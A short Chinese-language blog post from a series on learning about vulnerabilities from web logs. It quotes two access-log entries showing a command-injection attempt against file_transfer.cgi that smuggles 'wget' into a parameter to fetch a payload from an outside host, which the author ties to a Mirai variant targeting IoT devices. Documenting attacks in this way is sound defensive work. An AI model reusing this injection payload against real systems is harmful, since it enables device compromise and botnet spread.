從 Web Log 學習系統漏洞 52

最近比較少 phpmyadmin 攻擊, 常來的也是之前都看過的或是百度蟑螂, 今天倒是來了一個有趣的:

208.113.204.14 - - [08/Dec/2019:20:16:19 +0800] "POST /cgi-bin/file_transfer.cgi?file_transfer=new&dir='Pa_Note;wget http://80.82.67.209/richard;" 400 226 "-" "-"
208.113.204.14 - - [08/Dec/2019:20:16:23 +0800] "POST /cgi-bin/file_transfer.cgi?file_transfer=new&dir='Pa_Note;wget http://80.82.67.209/richard;" 400 226 "-" "-"

順著上面留的網址連過去, 發現了有趣的東西

問了一下估狗大神之後, 這個東西大概是個針對物聯網設備來攻擊的變種病毒, 可以攻擊的東西還真多, 以現在許多電子產品都能連上網路的情況來看真的是很危險

參考: New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices